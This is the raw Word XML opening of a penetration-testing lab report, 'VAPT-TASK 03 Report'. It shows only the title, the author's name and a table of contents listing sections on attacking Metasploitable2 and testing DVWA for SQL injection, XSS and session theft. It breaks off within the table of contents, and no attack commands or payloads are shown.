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6E878D34" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="3AB8D40C" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="55433401" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="38710B01" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="540DC955" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="66E0A61F" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="05D6FD5E" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="01A9FA83" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="164DD383" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="2A8F8458" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="2B284ABC" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="6732979C" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="6312FD80" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="491722D8" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="08D712D2" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="2E77409F" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="2A9F3151" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="30B36020" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="57889140" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="038926ED" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="73E0F472" w14:textId="77777777" w:rsidR="00783A41" w:rsidRDefault="00783A41"/>
    <w:p w14:paraId="4E476697" w14:textId="45AEDC21" w:rsidR="00783A41" w:rsidRDefault="00783A41" w:rsidP="00783A41">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc224128472"/>
      <w:r w:rsidRPr="00783A41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>VAPT-TASK 03 Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3CE23F1D" w14:textId="44F32FF9" w:rsidR="00783A41" w:rsidRPr="00783A41" w:rsidRDefault="00783A41" w:rsidP="00783A41">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Mohammed Hussain Shaikh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44941CA4" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="011B9F44" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="1BB9A575" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="3C0D445C" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="64044E01" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="143176F3" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="48AD020C" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="303461EC" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="649D7339" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>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448E73D9" w14:textId="77777777" w:rsidR="00BB375B" w:rsidRDefault="00BB375B"/>
    <w:p w14:paraId="164CF47D" w14:textId="77777777" w:rsidR="005E73D2" w:rsidRDefault="005E73D2"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:id w:val="-1423187050"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="6072BF03" w14:textId="768F2835" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0EAE6DB3" w14:textId="13E52167" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc224128472" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>VAPT-TASK 03 Report</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128472 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54B3153D" w14:textId="0786B393" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128473" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128473 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75429B40" w14:textId="08798D95" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128474" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chained Attack on Metasploitable2 VM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128474 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="174ADB24" w14:textId="4386F3ED" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128475" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Remediation Plan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128475 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DC5B558" w14:textId="1CF7DC58" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128476" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>100-word email to developers with exploit details</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128476 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14CAAC77" w14:textId="2E75351A" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128477" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Test DVWA VM for OWASP Top 10 issues</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128477 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E470D40" w14:textId="7575F2D1" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128478" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Testing for SQL Injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128478 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46D416AF" w14:textId="660A78DC" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128479" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Testing for XSS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128479 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51770786" w14:textId="2A8AF9A8" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128480" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Testing for Session Token Theft</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128480 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E687240" w14:textId="63E096AD" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128481" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scanning the DVWA website for alerts</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128481 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67F3E188" w14:textId="5E643DB8" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128482" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>50-word web test summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128482 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="122007E9" w14:textId="1C1C2F69" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128483" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>DVWA Web Application Vulnerability Findings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128483 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71DC1F87" w14:textId="1EF7BD3D" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128484" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network Attack Path Diagram</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128484 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24B26C7D" w14:textId="6AF96289" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128485" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>100-word non-technical summary for managers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128485 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6BF8C75B" w14:textId="2944829F" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128486" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
